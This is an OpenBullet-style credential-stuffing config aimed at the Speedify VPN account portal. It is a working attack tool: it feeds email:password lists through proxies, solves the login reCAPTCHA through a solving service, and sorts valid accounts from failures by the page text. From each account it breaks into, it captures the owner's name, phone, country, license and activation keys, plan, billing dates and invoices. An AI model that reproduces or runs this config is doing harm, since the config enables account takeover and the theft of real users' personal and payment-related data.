[SETTINGS]
{
  "Name": "SpeedifyVPN - Capmonster",
  "SuggestedBots": 30,
  "MaxCPM": 0,
  "LastModified": "2022-03-01T02:33:18.281296+04:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🅺🅴🆂🅷🅰🆅🅴 🅲🅰🆄🆂🆂🆈",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
SOLVECAPTCHA ReCaptchaV2 "6LdS5scbAAAAAN4O3mLuCBR45xKg9o2gYa0aT35f" "https://my.speedify.com/login" 

REQUEST POST "https://my.speedify.com/login" 
  CONTENT "username=<USER>&password=<PASS>&g-recaptcha-response=<SOLUTION>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: my.speedify.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://my.speedify.com/" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: 48" 
  HEADER "Origin: https://my.speedify.com" 
  HEADER "Connection: keep-alive" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<div id=\"error-message\" class=\"alert alert-danger\"" 
    KEY "Bad username and/or password." 
    KEY "Either the username or password were incorrect." 
  KEYCHAIN Success OR 
    KEY "Sign Out" 
    KEY "Redirecting to <a href=\"/account\"" 

#USER REQUEST GET "https://my.speedify.com/api/v1/subscriptions/user" 
  
  HEADER "Host: my.speedify.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Referer: https://my.speedify.com/account" 
  HEADER "Connection: keep-alive" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Accept-Encoding: gzip, deflate" 

#userid PARSE "<SOURCE>" LR "{\"userid\":" "," -> VAR "userid" 

#refid PARSE "<SOURCE>" LR "{\"referenceId\":\"" "\"" -> VAR "refid" 

#Firstname PARSE "<SOURCE>" JSON "firstname" CreateEmpty=FALSE -> CAP "Firstname" 

#Lastname PARSE "<SOURCE>" JSON "lastname" CreateEmpty=FALSE -> CAP "Lastname" 

#Date_Joined PARSE "<SOURCE>" LR "\"createTime\":\"" "T" CreateEmpty=FALSE -> CAP "Date Joined" 

#Phone PARSE "<SOURCE>" JSON "phone" CreateEmpty=FALSE -> CAP "Phone" 

#Country PARSE "<SOURCE>" JSON "country" CreateEmpty=FALSE -> CAP "Country" 

#activationKey PARSE "<SOURCE>" JSON "activationKey" CreateEmpty=FALSE -> CAP "activationKey" 

#License PARSE "<SOURCE>" LR "[{\"license\":\"" "\"" CreateEmpty=FALSE -> CAP "License" 

#Plan PARSE "<SOURCE>" LR "\"type\":\"" "\"" CreateEmpty=FALSE -> CAP "Plan" 

#Active PARSE "<SOURCE>" LR "\"active\":" "," -> VAR "Active" 

#isPlanActive FUNCTION Translate 
  KEY "0" VALUE "False" 
  KEY "1" VALUE "True" 
  "<Active>" -> CAP "isPlanActive" 

#Next_Billing PARSE "<SOURCE>" LR "\"nextPeriodDate\":\"" "T" CreateEmpty=FALSE -> CAP "Next Billing" 

#Platform PARSE "<SOURCE>" JSON "platform" CreateEmpty=FALSE -> CAP "Platform" 

#US PARSE "<SOURCE>" LR "{\"usageBytesThisPeriod\":" "," -> VAR "US" 

#USAGE FUNCTION Compute "(((<US>/1024)/1024)/1024)" -> VAR "USAGE" 

#Bandwidth FUNCTION Round "<USAGE>" -> VAR "Bandwidth" 

#Bandwidth_Used FUNCTION Compute "<Bandwidth>" -> VAR "Bandwidth Used" 

#Total_Bandwidth_Used FUNCTION Constant "<Bandwidth>GB" -> CAP "Total Bandwidth Used" 

#Invoices REQUEST GET "https://my.speedify.com/api/v1/users/recurly/subscriptions/<refid>/invoices" 
  
  HEADER "Host: my.speedify.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Referer: https://my.speedify.com/account" 
  HEADER "Connection: keep-alive" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Accept-Encoding: gzip, deflate" 

#Currency PARSE "<SOURCE>" JSON "currency" -> VAR "Currency" 

#Plan_Price PARSE "<SOURCE>" JSON "total" CreateEmpty=FALSE -> CAP "Plan Price" "" " <Currency>" 

#Plan_Status PARSE "<SOURCE>" JSON "state" CreateEmpty=FALSE -> CAP "Plan Status" 

#AUTHOR FUNCTION Constant "🔥 YashvirGaming#7131 🔥" -> CAP "Config By" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"active\":0" 
    KEY "<Plan>" Contains "Speedify.Free" 

